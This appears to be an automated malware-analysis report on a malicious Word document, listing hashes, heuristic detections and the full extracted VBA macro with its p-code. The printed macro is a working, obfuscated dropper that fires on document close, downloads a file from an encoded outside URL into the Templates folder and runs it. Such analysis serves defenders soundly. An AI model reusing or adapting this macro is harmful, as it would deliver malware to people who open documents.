Office (OLE) / .DOC malware analysis — malicious · f371bdd898a0b4df

MALICIOUS

Office (OLE) / .DOC

127.2 KB Created: 2025-11-29 23:18:00 Authoring application: Microsoft Office Word First seen: 2026-06-16

MD5: 7e59fcf3fb579db4f9a13050db312fa6 SHA-1: f18c21811f5470d39b3ba0e689b48eec07211dbf SHA-256: f371bdd898a0b4df2121ebdd11fede889060906de0cd75aebba3c9ebfea6b2da

242 Risk Score

Heuristics 7

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
WScript.Shell usage critical OLE_VBA_WSCRIPT

WScript.Shell usage
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```

VBA downloads and writes a file to disk critical OLE_VBA_HTTP_DROP_EXEC

VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning.

Matched line in script

¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª· = ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.responseBody

CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
    Set WshShell = CreateObject("WScript.Shell")
```
Reference to Windows Script Host high SC_STR_WSCRIPT

Reference to Windows Script Host
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 24725 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	24725 bytes
SHA-256: `f4454dabcc7a7807ade4181b862a40ffef8f91ea8108e4941254e32e42446a42`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() Dim ¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬ As Integer ¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬ = Chr(50) + Chr(48) + Chr(48) Dim WshShell As Object Dim oSpecialPathnhbjkj As String Set WshShell = CreateObject("WScript.Shell") oSpecialPathnhbjkj = WshShell.SpecialFolders("Templates") Dim «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼° Dim ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª· Dim ©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸ Dim º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ Dim ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ Dim ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ As Integer Dim ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º Dim ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ = 1 Set ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º = CreateObject("microsoft.xmlhttp") Set ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ = CreateObject("Shell.Application") º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ = oSpecialPathnhbjkj + ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´("\å¶ãKK§Ú.ÂÛÂ") ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.Open "get", ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´("hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ"), False ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.send ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª· = ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.responseBody If ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º.Status = 200 Then Set «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼° = CreateObject("adodb.stream") «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Open «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Type = ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Write ¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª· «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.SaveToFile º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ + ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ «¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°.Close End If ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³.Open (º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦) End Sub Public Function ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦) ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ = " ?!@#$%^&()_+\|0123456789abcdefghijklmnopqrstuvwxyz.,-~ABCDEFGHIJKLMNOPQRSTUVWXYZ¿¡²³ÀÁÂÃÄÅÒÓÔÕÖÙÛÜàáâãäåØ¶§Ú¥" ¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹ = " ¿¡@#$%^&()_+\|01²³456789ÀbÁdÂÃghÄjklmÅÒÓqÔÕÖÙvwÛÜz.,-~AàáâãFGHäJKåMNØ¶QR§TÚVWX¥Z?!23acefinoprstuxyBCDEILOPSUY" For i = 1 To Len(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦) º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ = InStr(¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³, Mid(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, i, 1)) If º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ > 0 Then ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ = Mid(¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹, º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ, 1) ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« + ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸ Else ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« + Mid(ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦, i, 1) End If Next ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ = ·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´« End Function ' Processing file: /opt/analyzer/scan_staging/470c3413321b4981a3c364a4b97aef2d.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 5084 bytes ' Line #0: ' FuncDefn (Private Sub cSpecialPathjhbkvhj()) ' Line #1: ' Dim ' VarDefn º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ (As Integer) ' Line #2: ' LitDI2 0x0032 ' ArgsLd SpecialFolders 0x0001 ' LitDI2 0x0030 ' ArgsLd SpecialFolders 0x0001 ' Add ' LitDI2 0x0030 ' ArgsLd SpecialFolders 0x0001 ' Add ' St º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ ' Line #3: ' Dim ' VarDefn ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ (As Object) ' Line #4: ' Dim ' VarDefn id_02A0 (As String) ' Line #5: ' Line #6: ' SetStmt ' LitStr 0x000D "WScript.Shell" ' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 ' Set ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ ' Line #7: ' LitStr 0x0009 "Templates" ' Ld ¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½ ' ArgsMemLd µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º 0x0001 ' St id_02A0 ' Line #8: ' Dim ' VarDefn ¦ªµ½¹¡«ª³«©¡£®¥ºº¥°¸¦¶§¸¬³¬¦©²©µ¥²µ³º«£³³¹¨«¶·¤¡»¿¹£¦¥¦£¬¨¤¶©©°¦¤©¶¨º¹¢¨´¢§°·£¤««µº®´¿³®£´£¥¨³ ' Line #9: ' Dim ' VarDefn ¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨ ' Line #10: ' Dim ' VarDefn ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º ' Line #11: ' Dim ' VarDefn ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ ' Line #12: ' Dim ' VarDefn ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ ' Line #13: ' Dim ' VarDefn ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ (As Integer) ' Line #14: ' Dim ' VarDefn ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ ' Line #15: ' Dim ' VarDefn ¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹ ' Line #16: ' LitDI2 0x0001 ' St ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦ ' Line #17: ' Line #18: ' Line #19: ' Line #20: ' Line #21: ' SetStmt ' LitStr 0x0011 "microsoft.xmlhttp" ' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 ' Set ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ ' Line #22: ' SetStmt ' LitStr 0x0011 "Shell.Application" ' ArgsLd ¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸¹µ¬¶§¨¼µ®»¶¾ªºº³³¬§°¯£¯¡º®º¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸² 0x0001 ' Set ¢ª¨·¨¢¥¶´®¡¾º¸¾¦³¿¸½¤§»¼°¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ ' Line #23: ' Line #24: ' Ld id_02A0 ' LitStr 0x000C "\å¶ãKK§Ú.ÂÛÂ" ' ArgsLd º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ 0x0001 ' Add ' St ¼¿ª¾³¸¸·º§¤²¬¤¥µ·¹´¬£¨¾³µ¯³¶½¼²¹¦¦º¿¨¸«¸©²®²¹µ¿¶«º¯«®§´¼¯®¨¶´ª©º¾¦¡§¼¹¹¸»³·»ª¶µ¾¹º¶ª·¦§½¶¬¼·¿ ' Line #25: ' LitStr 0x0003 "get" ' LitStr 0x0034 "hÖÖÓ://ÓÂÀÁÂzÒÅÂÃlÒw.ÜdÅÕ.ÂÙ/mbÄÅÄgbÀÂÖ/ÕwÒÅdbdb.ÂÛÂ" ' ArgsLd º¶ª·¦§½¶¬¼·¿©»»´´«¦²¬¢®°»¬»º·®¿¢«¥¢¤³½½¥¤²¯µ©°«§µ¹³©¬«¬ª¼¸¼¡¿·¯¬«¿¡¯´¦¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ 0x0001 ' LitVarSpecial (False) ' Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ ' ArgsMemCall Open 0x0003 ' Line #26: ' Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ ' ArgsMemCall ¨²¾·¼¥¨º»¡»¾«½°¶·¶¹¨¥¡®¥¦´¶¸³®¥©¼²´¿²µ¼º°¸§§¹¾©·¬·ª°¿°·´¾µ¬¸¾¬¯¨³»¿¯©µ²«ª¹½§¢¨»¸¸·º²¶º«µ´½¸ 0x0000 ' Line #27: ' Ld ¨¿£¨¯¦°ªª½µ©´»«¹¬º½£©«¯¤¦¸ªµ¸¶½¾§¶¶¼®¾²º©³¾»µ¨£¢£°©®©¹¯¯¥£¡¦¹®½´§¥·§¤´º¨¡¨¿°½¼¢¬¢ª¨·¨¢¥¶´®¡¾º¸¾¦³ ' MemLd ¹µ¯¾£¬¦£¥²¼¼¦¥°¿´ª¡¬¨³¸²ª®®®«»·»¢¾¶¿®¬¾¢¿³§©¾¤ª¿§¡««¼´«³º¬¸®¹¼¤«¬¿¥§·«´·µ»½©´µ»¯½°¹ª²½º´©¤£¤¢ ' St 